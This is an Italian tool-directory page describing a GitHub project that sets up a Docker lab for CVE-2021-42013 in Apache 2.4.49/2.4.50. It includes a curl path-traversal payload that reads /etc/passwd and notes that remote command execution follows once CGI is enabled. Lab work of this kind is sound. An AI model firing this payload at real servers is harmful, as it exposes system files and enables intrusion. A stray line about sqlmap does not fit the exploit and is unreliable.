Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Testato su: 2.4.49 e 2.4.50 Descrizione: Vulnerabilità di Path Traversal o Remote Code Execution in Apache 2.4.49 e 2.4.50 | Kitploit
Strumenti/GitHubGitHub/cybfar/cve-2021-42013-httpd
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Testato su: 2.4.49 e 2.4.50 Descrizione: Vulnerabilità di Path Traversal o Remote Code Execution in Apache 2.4.49 e 2.4.50

Vedi Repository
113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dockerizzazione di una Vulnerabilità: cve-2021-42013

Questo progetto mira a dockerizzare una vulnerabilità specifica utilizzando Docker. L'obiettivo è creare un ambiente isolato nel quale la vulnerabilità possa essere sfruttata e testata in modo sicuro.

Applicazione vulnerabile

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

Installazione

Per eseguire questo progetto, è necessario avere sulla propria macchina:

  • Docker
  • Python
  • Curl

Una volta installati i prerequisiti, puoi clonare questo repository Git sulla tua macchina:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

Una volta nella directory, esegui il comando qui sotto per impostare l'ambiente vulnerabile:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

Accedi quindi all'applicazione all'indirizzo http://localhost:8000 Se tutto va bene, dovresti vedere visualizzato "It works"

Sfruttamento della vulnerabilità

L'esecuzione di questo payload con curl qui sotto ci mostra che il target è vulnerabile. Lo script genererà il comando sqlmap appropriato per sfruttare la vulnerabilità

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

Questo payload può accedere direttamente alle informazioni relative all'utente nel sistema senza il consenso dell'utente.

Una volta che avremo attivato i moduli cgi o cgid sul server, questa vulnerabilità permetterà a un attaccante di eseguire comandi arbitrari

Scarica lo strumento